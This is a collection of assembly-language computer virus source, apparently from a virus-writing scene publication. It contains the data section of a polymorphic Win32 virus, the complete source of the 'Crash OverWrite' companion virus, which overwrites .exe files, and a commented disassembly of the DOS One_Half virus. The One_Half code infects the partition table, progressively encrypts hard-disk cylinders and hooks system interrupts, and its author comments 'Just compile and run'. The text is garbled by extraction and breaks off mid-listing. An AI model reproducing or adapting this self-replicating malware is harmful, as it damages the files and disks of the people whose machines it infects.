add dword ptr [ebp+PolyLen], 5h add dword ptr [ebp+LoopLen], 5h ret

; *************************************************************************** ; -------------------[ Data which does not travel ]-------------------------; *************************************************************************** VirusEnd: ; ok, this data will travel, but will be generated ; new on each run PDecrypt:

; ; ; ;

ret db 150d dup (0h)

here will we add the polymorphic decryption routine later, but not included into 1.st generation so we just return

; we keep 150 bytes free, so we have a buffer ; for the poly decryptor

; here we save the data which does not ; travel which each copy of the virus PolyKey PolyLen VirLen LoopLen CryptType

db dd dd dd dd

(?) (?) (?) (?) (?)

; ; ; ; ;

Reg1 Reg2

db (?) db (?)

; here we save the registers we use for the junk ; code

SEH_Save

dd (?)

; We save the original SEH

K32Handle IHLHandle ADVHandle W32Handle

dd dd dd dd

; ; ; ; ;

(?) (?) (?) (?)

XLoadLibraryA XGetProcAddress

dd (?) dd (?)

key for the poly decryptor lenght of decryptor virus lenght + decryptor lenght of the decryption loop we save which kind of encryption we use

Handles of the dll's we use Kernel32.dll might be nessecairy *g* Imagehlp.dll to create checksums Advapi32.dll for registry access Winsck32.dll for pinging

; The Offsets of the API's we use ; Here we save their Offset

XFindFirstFileA XFindNextFileA XFindClose XCreateFileA XSetFileAttributesA XCloseHandle XCreateFileMappingA XMapViewOfFile XUnmapViewOfFile XGetWindowsDirectoryA XGetSystemDirectoryA XGetCurrentDirectoryA XSetCurrentDirectoryA XGetFileAttributesA XGetTickCount XCreateThread XGetSystemTime

dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

(?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?) (?)

XCheckSumMappedFile

dd (?)

XRegOpenKeyExA XRegQueryValueExA XRegCloseKey

dd (?) dd (?) dd (?)

Xsocket XWSACleanup XWSAStartup Xclosesocket Xsendto Xsetsockopt

dd dd dd dd dd dd

(?) (?) (?) (?) (?) (?)

KernelAddy MZAddy

dd (?) dd (?)

; Data to search Kernel ; Pointer to kernel PE-Header ; Pointer to kernel MZ-Header

RegHandle

dd (?)

; Handle to open Reg-Key

windir curdir

counter ATableVA NTableVA OTableVA

db 7Fh dup (0) db 7Fh dup (0)

dw dd dd dd

(?) (?) (?) (?)

NewSize dd (?) CheckSum dd (?) HeaderSum dd (?)

; Directory's ; here we save the directory's ; we want to infect ; ; ; ; ;

some data for infection a counter to know how many names we have compared the Address Table VA the Name Pointer Table VA the Name Pointer Table VA

; we save the new size of the file here ; checksum ; crc of header ; Data to find files

WIN32_FIND_DATA WFD_dwFileAttributes WFD_ftCreationTime WFD_ftLastAccessTime WFD_ftLastWriteTime WFD_nFileSizeHigh WFD_nFileSizeLow WFD_dwReserved0

label dd FILETIME FILETIME FILETIME dd dd dd

byte ? ? ? ? ? ? ?

WFD_dwReserved1 WFD_szFileName WFD_szAlternateFileName WFD_szAlternateEnding

dd db db db

? 260d dup (?) 13 dup (?) 03 dup (?)

FileHandle MapHandle MapAddress

dd dd dd

(?) (?) (?)

; handle of file ; Handle of Map ; offset of Map

Attributes threadID

dd dd

(?) (?)

; ; ; ;

Buffer

db

337d dup (?)

saved File-Attributes payload runs in an extra thread we need this buffer for follwing the shortcuts

; this buffer is nessecairy ; to create a winsock connection ( ping ) WSA_DATA SystemTime: wYear wMonth wDayOfWeek wDay wHour wMinute wSecond wMilliseconds

db

400d dup (0) ; needed to get the current day

dw dw dw dw dw dw dw dw

(?) (?) (?) (?) (?) (?) (?) (?)

; Sunday = 0, Monday = 1 .. etc.

EndBufferData: ; *************************************************************************** ; ------------------------[ That's all folks ]------------------------------; *************************************************************************** end Virus

; comment * ; ; Name: Crash OverWrite :-) ; Coder: BeLiAL ; ; This is my first win32 virus.Its only a ; companionvirus but it does his work very ; well.Its perhaps coded a bit lame but ; im sure nobody will care.It infects the ; first file in the directory and renames ; the victimfile to .dat .I perhaps i ; make it resident or infecting more file... ; Greetings and thanx go out ; to Evul,Toro,Padisah and Wallo. ; ; BeLiAL ;* .386 .model flat Locals Jumps Extrn Extrn Extrn Extrn Extrn Extrn Extrn Extrn Extrn Extrn Extrn Extrn Extrn

FindFirstFileA FindNextFileA CreateFileA WriteFile ReadFile GlobalAlloc GlobalFree ExitProcess WinExec CopyFileA CloseHandle SetFilePointer GetFileSize

:PROC :PROC :PROC :PROC :PROC :PROC :PROC :PROC :PROC :PROC :PROC :PROC :PROC

.data MAX_PATH FALSE changeoffset winsize

EQU EQU EQU EQU

FILETIME struct dwLowDateTime dwHighDateTime FILETIME ends

0ffh 0 094fh 05h

DWORD DWORD

? ?

WIN32_FIND_DATA struct dwFileAttributes DWORD ? ftCreationTime FILETIME <> ftLastAccessTime FILETIME <> ftLastWriteTime FILETIME <> nFileSizeHigh DWORD ? nFileSizeLow DWORD ? dwReserved0 DWORD ? dwReserved1 DWORD ? cFileName BYTE MAX_PATH dup(?) cAlternate BYTE 0eh dup(?) ends FindFileData WIN32_FIND_DATA <>

memptr counter1 filehandle filesize exefile myname

secbuffer

dd dd dd dd db db dd dd dd dd dd dd db

0 0 0 00001000h '*.exe',0 'crashoverwrite.exe',0 0 0 0 0 0 0 '[Crash OverWrite] coded by BeLiAL'

.code start: push offset FindFileData push offset exefile call FindFirstFileA already_infected: mov eax,dword ptr nFileSizeLow.FindFileData cmp eax,00001000h je reanimate mov eax,offset cFileName.FindFileData find_dot1: cmp byte ptr ds:[eax],'.' je next_step1 add eax,1 jmp find_dot1 next_step1: add eax,1 push eax mov byte ptr ds:[eax],'d' add eax,1 mov byte ptr ds:[eax],'a' add eax,1 mov byte ptr ds:[eax],'t' mov ebx,offset cFileName.FindFileData mov eax,offset secbuffer find_dot2: mov dh,byte ptr ds:[ebx] cmp edx,0 je next_step2 mov byte ptr ds:[eax],dh add ebx,1 add eax,1 jmp find_dot2 next_step2: pop eax push FALSE push offset secbuffer mov byte ptr ds:[eax],'e' add eax,1 mov byte ptr ds:[eax],'x' add eax,1 mov byte ptr ds:[eax],'e' push offset cFileName.FindFileData call CopyFileA push FALSE push offset cFileName.FindFileData push offset myname call CopyFileA

open_victim: push 0 push 080h push 3h push 0h push 0h push 0c0000000h push offset FindFileData.cFileName Call CreateFileA mov filehandle,eax cmp eax,0ffffffffh je reanimate getmemory: push filesize push 0 Call GlobalAlloc ;get the memory mov edx,eax cmp eax,0 je close_file push edx copyinmemory: push 0 push offset counter1 push filesize push edx push filehandle Call ReadFile pop edx mov dword ptr memptr,edx ;for later use add edx,changeoffset mov eax,offset cFileName.FindFileData modify_victim: mov bh,byte ptr ds:[eax] mov byte ptr ds:[edx],bh cmp bh,0 je set_pointer add eax,1 add edx,1 jmp modify_victim set_pointer: push 0 push 0 push 0 push filehandle call SetFilePointer copy_to_file: push 0 push offset counter1 push filesize push memptr push filehandle call WriteFile close_file: push filehandle call CloseHandle reanimate: mov eax,offset myname find_dot3: mov bx,word ptr ds:[eax] cmp bx,'e.' je next_step3 cmp bx,'E.' je next_step3

add eax,1 jmp find_dot3 next_step3: add eax,1 mov byte ptr ds:[eax],'d' add eax,1 mov byte ptr ds:[eax],'a' add eax,1 mov byte ptr ds:[eax],'t' add eax,1 mov byte ptr ds:[eax],00h that_was_all: push winsize push offset myname call WinExec final: push 0 call ExitProcess ends end start

; Virus One_Half ; Disassembly done by Ratter ; ; ; ; ;

It's a polymorfic reverzibel multiparit virus from Slovak coder known under the nick Vyvojar(==Developer). It's also author of Level3. This is a disassembly I enjoyed the most. It's a one of the best virus in the dead world of DOS. It's functional. Just compile and run :)

; To Vyvojar: If ya're still living, could ya pls lemme know about it? ; I would be very happy if i could speak with you sometimes ... ; To otherz who are reading this: Pls lemme know if there's any bug in the code. ; Or just to say ya like this :) ; You can reach me on Undernet channel #virus, #3c or via email: [email protected] ; Compile: ; tasm /t/m2 one_half.asm ; tlink /t one_half.obj .486p .487 seg_a

segment byte public use16 assume cs:seg_a, ds:seg_a

org 100h one_half start:

proc

far

jmp loc_08d1 ;jmp loc_0208 db loc_0168: db jmp ; db loc_0182: cld std jnz jmp ; db ; loc_01B1: xor jmp ; db ; loc_01f5: db mov db db jmp ; db ;

; jmp to viruz_start ; jmp to decode routine_start

101 dup (0) 81h,0C0h,0FEh, 6Eh ; add loc_056c 19 dup (0)

short loc_01B1 loc_08D1 40 dup (0)

[di], ax short loc_0168 64 dup (0)

2eh di, 582h 36h 3eh loc_049b 10 dup (0)

; cs: ; ss: ; ds:

ax, 6EFEh

loc_0208: push ax nop db 36h ; ss: sti db 36h ; ss: clc sti jmp loc_0381 ; db 367 dup (0) ; loc_0381: push cs cld jmp loc_047c ; db 246 dup (0) ; loc_047C: nop sti db 36h ; ss: clc nop pop ds db 36h ; ss: jmp loc_01f5 ; db 21 dup (0) ; loc_049b: cld db 3eh ; ds: mov ax, 0bfbah db 3eh ; ds: std jmp loc_01b1 ; db 148 dup (0) ; loc_0539: db 81h,0FFh, 5Ah, 13h ; cmp sti jmp loc_0182 ; db 43 dup (0) ; loc_056c: clc sti cmc db 3eh ; ds: nop inc di db 36h ; ss: jmp loc_0539 pop ss ; db 12 dup (0) ; ;

di, 135ah

loc_0582: ; p label near p_ equ offset the_second_part - offset boot_start p__ equ presun_rutiny + (p - buffer) ; _mcb_ db 'Z' ; it'z last_block dw 9F01h ; PSP dw 0FFh ; 4096 bytez db 3 dup(?) ; reserved db 'COMMAND', 0 ; blockz_owner_name ... ; exe_header dw 20CDh ; exe_signature part_pag dw 501eh page_cnt dw 09b4h relo_cnt dw 0 hdr_size dw 21cdh min_mem dw 1f58h max_mem dw 0bac3h relo_ss dw 03d0h exe_sp dw 0efe8h exe_flag db 00h ; checksum db 0b4h exe_ip dw 0100h relo_cs dw 0FFF0h tabl_off dw 0BA05h ; decode_routine_table: dw 0208h ; here'z the table dw 0381h ; of offsetz, where are dw 047ch ; the chunkz of code of dw 01f5h ; decode_routine dw 049bh xor_offset dw 01b1h dw 0168h dw 056ch dw 0539h jnz_offset dw 0182h ; beginning_ofs dw 07beh ; overwritten_bytez: db 06h, 83h, 05h, 00h, 00h, 2Eh db 8Ch, 0Eh, 85h, 05h, 4Fh, 02h db 00h, 2Eh,0A1h,0A3h, 05h, 26h db 0C7h db 'G.com <jmen' db 0Bh, 26h, 3Ah, 47h, 21h,0BAh db 4Ah, 05h, 0Fh db '„_driveru>', 0Ah, 't' db 0FFh,0C6h, 44h,0FFh, 00h,0B8h db 03h, 4Bh,0BBh, 80h, 00h, 8Ah db 0Ch, 0Ah,0C9h,0BAh, 68h, 04h db 0Fh db 'ys ...', 0Ah, 0Dh, '$' db 17h db 'instalovan' db 02h,0EBh, 03h,0E9h, 43h, 02h db 4Eh, 56h, 89h, 36h ; ; hdr_size_

dw

10h

date_div page_size_ ;

dw dw

1Eh 200h

; Here starts boot_version of One_Half boot_start: xor bx, bx cli mov sp, 07c00h ; set up stack mov ss, bx ; 2 0000h:7c00h sti mov ds, bx sub word ptr ds:[413h], 4 ; dec mem_size o 4 kila mov cl, 6 int 12h ; gimme mem_size shl ax, cl ; count the segment mov dx, 80h ; first harddisk, 0. head mov es, ax ; my_new_seg 2 es db 0b9h ; mov cx, ? viruz_start_sec dw 0bh ; gimme virus_start_sec mov ax, 0207h ; read 7 secz push es ; (viruz_body) int 13h mov ax, offset the_second_part - p push ax retf ; go2 new_segment_part ; the_second_part: mov word ptr ds:[21h * 4 + 2], cs; store cs 2 21h * 4 + 2 mov ax, word ptr ds:[46ch] ; gimme tick_counter push ds push cs ; make ds = cs pop ds mov word ptr ds:[mov_bx_? - p], ax ; store counter mov ax, cs inc ax mov word ptr ds:[_mcb_ + 1 - p], ax ; store block_owner mov byte ptr ds:[run_jmp - p], 0; nulluj displ8 2 set our ; own _mcb_ as last_one call sub_078b ; move presun_rutiny pop es mov bx, sp ; 7c00h 2 bx push es mov si, word ptr es:[bx+p_] ; gimme cur_cyl_number_ ; _2_crypt db 81h, 0feh ; cmp si, ? lowest_cyl dw 07h ; less than lowest_cyl ? jbe loc_06d6 push si ; nope sub si, 2 ; ok crypt 2 cylinderz mov word ptr ds:[not_crypt_cyl - p], si ; store cyl - 2 pop si mov ah, 08h ; gimme drivez_paramz int 13h jc loc_06d6 ; error ? mov al, cl ; gimme max_sec_number and al, 03fh ; voklesti max_sec mov byte ptr ds:[secz_count - p__], al ; secz_2_crypt mov cl, 1 ; starting_sec 2 cl mov bh, 7eh ; buffer_ptr 2 7e00h mov word ptr ds:[buf_ptr - p__], bx ; store buffer_ptr mov dl, 80h ; set up drive 2 first harddisk loc_069E:

dec si ; dec cylinder_number call sub_0798 ; convert cyl_number push dx loc_06A3: mov ah, 2 ; read 1 cylinder push ax int 13h pop ax jc short loc_06B4 ; error ? db 0e8h ; call crypt_ dw offset crypt_ - presun_rutiny + buffer - next_ next_ label near ; crypt_ it inc ah ; make function 03h push ax int 13h ; and write crypted_cyl pop ax loc_06B4: jc short loc_072B ; error ? test dh, 3Fh ; last head ? jz short loc_06BF dec dh ; dec head jmp short loc_06A3 ; and go on loc_06BF: ; yope pop dx db 81h, 0feh ; cmp si, ? not_crypt_cyl dw 1bfh ; ok 2 cylinderz crypted_ ? ja loc_069E loc_06C6: ; yope mov bh, 7Ch ; buffer 2 7c00h mov es:[bx+p_], si ; store new cur_cyl_number_2_ mov ax, 301h ; _crypt mov cx, 1 ; and write partition_table mov dh, ch ; (boot_start) back int 13h loc_06D6: mov ds:[cur_cyl_number - p__], si db 81h, 0feh ; cmp si, ? one_half_cyl dw 136h ; more than one_half_crypted ? ja short loc_06E3 call sub_07EC ; ok try 2 write text loc_06E3: ; nope not yet mov ax, 201h ; ok now read mov bx, 7C00h ; 2 buffer 7c00h mov cx, ds:[viruz_start_sec - p] ; gimme viruz_... dec cx ; go2 orig_partition_table mov dx, 80h ; orig_partition_table int 13h cli les ax, dword ptr es:[13h * 4] ; gimme old_int_13h mov ds:[old_int_13h - p__], ax ; and store it mov ds:[old_int_13h - p__ + 2], es pop es push es les ax, dword ptr es:[1ch * 4] ; gimme old_int_1ch mov ds:[old_int_1ch - p], ax ; and store it mov ds:[old_int_1ch - p + 2], es pop es push es ; set up my own mov word ptr es:[13h * 4], offset new_int_13h - p__ mov word ptr es:[13h * 4 + 2], cs ; new_int_13h mov word ptr es:[1ch * 4], offset new_int_1ch - p mov word ptr es:[1ch * 4 + 2], cs ; and new_int_1ch sti

push retf

bx ; and jump 2 orig_partition

; Diz uncryptz_cylinderz if any error occurez loc_072B: xor ah, ah push ax int 13h ; try 2 reset the disk pop ax loc_0731: inc dh ; inc head mov ah, dh ; head 2 ah pop dx ; pop max_head push dx cmp ah, dh ; cmp cur_head with max_head ja short loc_074E ; above ? mov dh, ah ; cur_head 2 dh mov ah, 2 ; read cylinder push ax int 13h pop ax db 0e8h ; call crypt_ dw offset crypt_ - presun_rutiny + buffer - next__ next__ label near ; uncrypt_ it inc ah push ax int 13h ; and write it back pop ax jmp short loc_0731 loc_074E: ; yope (error on first_cyl) pop dx ; pop max_head inc si ; inc cyl_number jmp loc_06C6 ; and end with crypt_ new_int_1ch: push ax push ds push es xor ax, ax mov ds, ax les ax, dword ptr ds:[21h * 4] ; gimme int_21h mov cs:[old_int_21h - p__], ax ; store offset mov ax, es ; gimme seg cmp ax, 800h ; are we under 800h ? ja short loc_0783 mov word ptr cs:[old_int_21h - p__ + 2], ax ; yope ; we've got dos_int_21h_seg les ax, dword ptr cs:[old_int_1ch - p]; gimme old_int_1ch mov ds:[1ch * 4], ax ; restore it back mov word ptr ds:[1ch * 4 + 2], es mov word ptr ds:[21h * 4], offset new_int_21h - p;and set up mov word ptr ds:[21h * 4 + 2], cs ; my new_int_21h loc_0783: ; nope pop es pop ds ; restore regz pop ax ; and db 0EAh ; jmp far ptr old_int_1ch old_int_1ch dw 0FF53h, 0F000h one_half

endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE

;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz movez some routinez ... sub_078B proc near mov si, offset presun_rutiny - p mov di, offset buffer - p mov cx, offset f_read_ - offset presun_rutiny - 4 cld rep movsb retn sub_078B endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz makez from cyl_number_in_si valid cx_reg sub_0798 proc near push ax mov ax, si mov ch, al push cx mov cl, 4 shl ah, cl pop cx mov al, 3Fh ; '?' and dh, al and cl, al not al push ax and ah, al or dh, ah pop ax shl ah, 1 shl ah, 1 and ah, al or cl, ah pop ax retn sub_0798 endp text_ db db

db 'Dis is one half.', 0Dh, 0Ah, 'Pr' 'ess any key to continue ...', 0Dh 0Ah

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz writez text if run_counter is even and it iz even day etc. sub_07EC proc near mov ah, 4 ; gimme CMOS date_&_time int 1Ah jc short loc_ret_0816 test dl, 3 ; day even etc. ? jnz short loc_ret_0816 test word ptr ds:[run_counter - p], 1; run_counter is even jnz short loc_ret_0816 mov cx, offset sub_07ec - offset text_; gimme text_length mov si, offset text_ - p ; gimme text_offset mov ah, 0Fh ; gimme cur_video_page_number int 10h ; why ? mov bl, 7 mov ah, 0Eh ; print char 2 cur_page ...

locloop_080D: lodsb ; gimme byte int 10h loop locloop_080D ; and go on xor ah, ah int 16h loc_ret_0816: retn sub_07EC endp

; wait 4 keyprezz

; and end ...

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz callz int_21h_file_fc with a handle in bx sub_0817 proc near push bx db 0bbh ; mov bx, ? handle_ dw 0 ; gimme handle int 21h ; call int_21h pop bx retn ; and end ... sub_0817 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz callz int_13h int_13h proc near pushf cli db 9Ah ; call far ptr int_13h_addr int_13h_addr dw 774h, 70h retn int_13h endp

; This is used for int_13h tracing new_int_01h: push bp mov bp, sp db 0ebh jump_patch_? db offset loc_084f - ($ + 1); jmp short loc_084F db 81h, 7eh, 04h ; cmp word ptr [bp+4], ? which_segment_? dw 0253h ja short loc_0853 push ax push bx push ds lds ax, dword ptr [bp+2] db 0bbh new_int_01h_mov_bx_? dw 5200h ; mov bx, ? mov cs:[int_13h_addr - p][bx], ax mov cs:[int_13h_addr - p + 2][bx], ds mov byte ptr cs:[jump_patch_? - p][bx], offset loc_084f - (offset jump_patch_? + 1) pop ds pop bx pop ax loc_084F: and byte ptr [bp+7], 0FEh

loc_0853: pop bp iret ; Diz installz viruz 2 mem loc_0855: pop bx ; pop index pop ax ; pop es_seg push ax dec ax ; go2 mcb_block mov ds, ax ; store it 2 ds cmp byte ptr ds:[0], 5Ah ; last one ? jne short loc_08CE add ax, ds:[3] ; add blockz_size sub ax, 0FFh ; sub 4 viruz_body mov dx, cs ; (4 our bufferz etc.) mov si, bx ; index 2 so mov cl, 4 shr si, cl ; make paragraphz add dx, si ; add it 2 cs db 2eh, 8bh, 0b7h, 1ah, 00h; mov si, cs:[1ah][bx] ; gimme min_mem (from exe_header) cmp si, 106h jae short loc_0881 mov si, 106h loc_0881: add dx, si ; add min_mem cmp ax, dx ; less ? jb short loc_08CE mov byte ptr ds:[0], 4Dh ; make middle_block sub word ptr ds:[3], 100h ; sub 100h paragraphz ; (0ffh viruz and 01h _mcb_) mov ds:[12h], ax ; set new mem_top 2 PSP mov es, ax ; gimme where_2_move_seg push cs pop ds inc ax mov ds:[1], ax ; store owner mov byte ptr [which_jump_? - p][bx], 0EBh mov si, bx ; gimme index xor di, di ; move 2 0000h mov cx, offset buffer - p ; gimme viruz_size rep movsb ; and finally move push es pop ds call sub_078B ; move presun_rutiny xor ax, ax mov ds, ax cli mov ax, ds:[21h * 4] ; gimme old_int_21h mov es:[old_int_21h - p__], ax ; store it mov ax, word ptr ds:[21h * 4 + 2] mov es:[old_int_21h - p__ + 2], ax mov word ptr ds:[21h * 4], offset new_int_21h - p mov word ptr ds:[21h * 4 + 2], es ; and set my own sti ; int_21h loc_08CE: jmp loc_0A1E ; and go on ; Diz iz the beginning ... loc_08D1: call sub_08D4

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_08D4 proc near pop si sub si, offset sub_08d4 - p ; count where we are mov [new_int_01h_mov_bx_? - p][si], si push es push si ; si = 582h cld inc word ptr [run_counter - p][si] mov byte ptr [which_jump_? - p][si], 74h xor ax, ax mov es, ax mov ax, es:[46Ch] ; gimme tick_counter mov [mov_bx_? - p][si], ax ; store it mov [crypt_value - p][si], ax; 2 timez mov ax, 4B53h ; am i in mem ? int 21h cmp ax, 454Bh ; check mark je short loc_0965 mov ah, 52h ; nope so go on int 21h ; gimme list_of_listz_ptr mov ax, es:[bx-2] ; gimme 1. MCB_segment mov [which_segment_? - p][si], ax ; store it mov byte ptr [jump_patch_? - p][si], 0 mov ax, 3501h ; get int_01h int 21h push bx ; store it to stack push es mov ax, 3513h ; get int_13h int 21h mov [int_13h_addr - p][si], bx ; store it to mov [int_13h_addr - p + 2][si], es; variablez mov ax, 2501h ; set my int_01h lea dx, [new_int_01h - p][si] int 21h lea bx, [buffer - p][si] mov cx, 1 ; read partition_table mov dx, 80h push cs pop es pushf pop ax or ah, 1 ; set trap_flag push ax popf mov ax, 201h ; and trace int_13h call int_13h pushf pop ax and ah, 0FEh ; null trap_flag push ax popf pop ds pop dx pushf mov ax, 2501h ; restore int_01h int 21h popf jc short loc_09C0 ; any errorz ? push cs pop ds

cmp word ptr [bx+25h], offset the_second_part - p jne short loc_0968 ; iz in partition my viruz ? ; (mark) loc_0965: jmp loc_0A1D loc_0968: cmp word ptr [bx + 180h], 72Eh; next mark je short loc_09C0 mov ah, 8 ; gimme hard_paramz mov dl, 80h ; prvniho_hadru call int_13h jc short loc_09C0 ; error ? and cx, 3Fh ; voklesti max_sector mov [max_sektor - p][si], cl mov [max_sektor_2 - p][si], cl and dh, 3Fh ; voklesti headz mov [max_heads - p][si], dh mov ax, 301h sub cl, 7 mov [partition_sec_n - p][si], cl mov dx, 80h call int_13h ; write partition_table jc short loc_09C0 ; error ? push cx push dx push si xchg di, si mov cx, 4 ; 4 entryz add bx, 1EEh ; go2 last_parition_entry locloop_09A9: mov al, [bx+4] ; read FAT type cmp al, 1 ; DOS 12bit ? je short loc_09C3 cmp al, 4 ; 4 = DOS 16bit ? jb short loc_09B8 ; 5 = EXTENDED_DOS_PARTITION ? cmp al, 6 ; 6 = BIGDOS (nad 32Mbyte) ? jbe short loc_09C3 loc_09B8: sub bx, 10h ; every record has 10h bytez loop locloop_09A9 pop si pop dx pop cx loc_09C0: jmp loc_0855 ; jmp 2 mem_install loc_09C3: mov cx, [bx+2] ; gimme boot_start mov dh, [bx+1] ; gimme head call sub_0D2F ; convert_it add si, 7 ; make valid cyl_number mov [lowest_cyl - p][di], si ; store it xchg si, ax mov cx, [bx+6] ; gimme end cylinder mov dh, [bx+1] ; gimme head call sub_0D2F ; convert_it mov [max_cyl_number - p][di], si; store it mov [mov_ax_? - p][di], si ; store it add ax, si shr ax, 1 ; div with 2 mov [one_half_cyl - p][di], ax; store one_half pop si pop dx

pop cx mov ax, 307h xchg bx, si inc cx mov [viruz_start_sec - p][bx], cx call int_13h ; write viruz_ body jc loc_09C0 ; (whole) lea si, [boot_start - p][bx]; and now move boot lea di, [buffer - p][bx] push di mov cx, offset the_second_part - offset boot_start rep movsb db 0b8h ; mov ax, ? mov_ax_? dw 265h ; store starting_sector_ stosw ; _2_ crypt mov ax, 301h ; write the new parition_table pop bx mov cx, 1 call int_13h jc loc_09C0 ; error ? loc_0A1D: pop bx ; nope loc_0A1E: push cs ; dis is a renewal of parts pop ds ; that were overwritten push cs ; by decode routine pop es db 8Dh,0B7h ; lea si, cs:[overwritt...][bx] dw offset overwritten_bytez - p db 81h,0C3h ;add bx, offset decode_... dw offset decode_routine_table - p mov cx, 0Ah ; there'z 0ah_partz locloop_0A2D: mov di, [bx] ; gimme where_2_move_offset push cx mov cx, 0Ah ; every_part haz 0ah bytez rep movsb pop cx inc bx ; go2 next_move_offset inc bx loop locloop_0A2D ; and go on pop es db 83h,0C3h ; add bx, 0 - (....) db 0 - (offset beginning_ofs - offset exe_header) mov di, es ; bx 2 exe_header_offset add di, 10h ; count start_seg add [bx+16h], di ; store relo_cs add [bx+0Eh], di ; store relo_ss cmp word ptr [bx+6], 0 ; what'bout relo_cnt ? je short loc_0AB6 ; there'z any ? mov ds, es:[2ch] ; yope; gimme environment_seg xor si, si ; start at offset 00h loc_0A56: inc si cmp word ptr [si], 0 ; eof formal_environment ? jne loc_0A56 add si, 4 ; go2 prog_name xchg dx, si mov ax, 3D00h ; open prog_file int 21h jc short loc_0ADB ; error ?

push cs pop ds mov ds:[handle_ - p - 10h][bx], ax ; store handle_ mov dx, [bx+18h] ; gimme tabl_offset mov ax, 4200h ; f_ptr 2 it call sub_0817 push es ; store start_seg xchg di, ax loc_0A79: push ax lea dx, cs:[reloc_buffer - p - 10h][bx] mov cx, [bx+6] ; gimme relo_cnt cmp cx, (name_buffer + 34 - random_number) shr 2 jb short loc_0A8A ; 2 big ? mov cx, (name_buffer + 34 - random_number) shr 2 ; yope gimme max_relo_cnt_now loc_0A8A: sub [bx+6], cx ; sub it from relo_cnt push cx shl cx, 1 ; mul it with 4 shl cx, 1 ; (segment:offset) mov ah, 3Fh ; read reloc_table call sub_0817 jc short loc_0ADB ; error ? pop cx pop ax xchg si, dx locloop_0A9D: add [si+2], ax ; make relo_seg les di, dword ptr [si] ; gimme relo_addr add es:[di], ax ; and add start_seg add si, 4 ; go2 next entry loop locloop_0A9D cmp word ptr [bx+6], 0 ; relo_cnt is null ? ja loc_0A79 ; if yope go on pop es ; nope mov ah, 3Eh ; so close_file call sub_0817 loc_0AB6: ; nope push es pop ds cmp byte ptr cs:[bx+12h], 0 ; com_file ? jne short loc_0ACC mov si, bx ; gimme exe_header_offset mov di, 100h mov cx, 3 ; move 3 bytez 2 100h rep movsb pop ax jmp short loc_0AD7 ; and go on loc_0ACC: ; nope it'z exe_file pop ax cli mov sp, cs:[bx+10h] ; gimme sp mov ss, cs:[bx+0Eh] ; gimme ss sti loc_0AD7: jmp dword ptr cs:[bx+14h] ; finally jmp 2 real_prog_start loc_0ADB: mov ah, 4Ch ; there waz an error ! int 21h

; reloc_buffer ;

label

near

; in : dx = max_number ; out : dx = random_number random_number: mov cs:[mov_si_? - p], si push ax push bx push cx push dx db 0b9h ; mov cx, ? mov_cx_? dw 0b0d4h db 0bbh ; mov bx, ? mov_bx_? dw 6210h mov dx, 15Ah mov ax, 4E35h xchg si, ax xchg dx, ax test ax, ax jz short loc_0AFC mul bx loc_0AFC: jcxz short loc_0B03 xchg cx, ax mul si add ax, cx loc_0B03: xchg si, ax mul bx add dx, si inc ax adc dx, 0 mov cs:[mov_bx_? - p], ax mov cs:[mov_cx_? - p], dx mov ax, dx pop cx xor dx, dx jcxz short loc_0B1E div cx loc_0B1E: pop cx pop bx pop ax pop si push si cmp byte ptr cs:[si], 0CCh ; there'z a breakpoint ? loc_0B27: je loc_0B27 ; if yope stay in loop ; (nice_try ...) db 0beh ; mov si, ? mov_si_? dw 5cbh retn sub_08D4 endp

; decode_routine haz 10 piecez ... (10 instructionz) ; instr_start: db 01h ; instruction_length db 50h ; push ?_reg ;

